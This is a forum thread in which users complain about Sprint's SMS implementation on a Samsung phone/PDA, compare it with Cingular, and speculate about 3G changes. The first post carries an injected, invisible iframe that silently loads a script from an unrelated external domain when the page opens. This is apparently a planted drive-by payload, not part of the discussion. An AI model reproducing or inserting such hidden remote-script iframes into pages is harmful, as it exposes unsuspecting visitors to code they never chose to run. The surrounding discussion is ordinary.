+ Reply to Thread

You can't Do True SMS...What a Ripoff!

This is amazing ....you'd think with combining a cell and a pda they'd know that we would want to SMS. So who is to blame for this Samsung or Sprint?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Samsung can't do anything about it, Sprint chose to do a crappy SMS implementation. I don't know if 3G will improve this at all, but we'll see soon enough.

-Brian

Originally posted by bkrodgers
    I don't know if 3G will improve this at all, but we'll see soon enough.

-Brian
    From looking at the kyo 7135 draft manual on the FCC site, it seems that SMS will now be the way it's supposed to be, you get the message delivered directly to your phone, and not the way it is now, where you have to dial into SprintWeb to get your messages.

I always thought that was a very crappy implementation, at least to the sms service I have on my cingular phone, If I send an sms from sprint to cingular, I get the message delivered directly to my phone, and not e-mail style like sprint, where you have to retrive your mail from a server.

If they can forward a web message alert, why don't they just send the sms message, maybe a scheme to make you use up your minutes.

Jorge

of course you are right, they make more money this way. But one benefit is that the incoming messages are host-based. If you accidently delete a message on say a voicestream phone it is gone forever. But sprint saves 60 of them, plus they are website accessable which is really cool.

BTW, up until june, sprint had offered incoming SMS messages right to your phone. You couldnt reply without logining on and the incoming message length was only around 60 chars INCLUDING subject so the rest of the message gets cut off. I was using that for the longest time, until they started the transfer to 3G when suddently instead of just receiving the message in the PAGE/TEXT window, a web/mail icon would appear and a popup would say you have a new short mail message like it is now.

also, is it just me, or is there NO 'reply' option while reading email on your phone. R they crazy, how could you overlook such an important feature. Also, only one line at a time comes up, you have to click 'more' to read another line and so on. GEEZ, they really really need beta testing. Good thing sprint doesnt make phone, they might forget to put an 'ON' button!
    I cant believe i spend $119.00a month on these people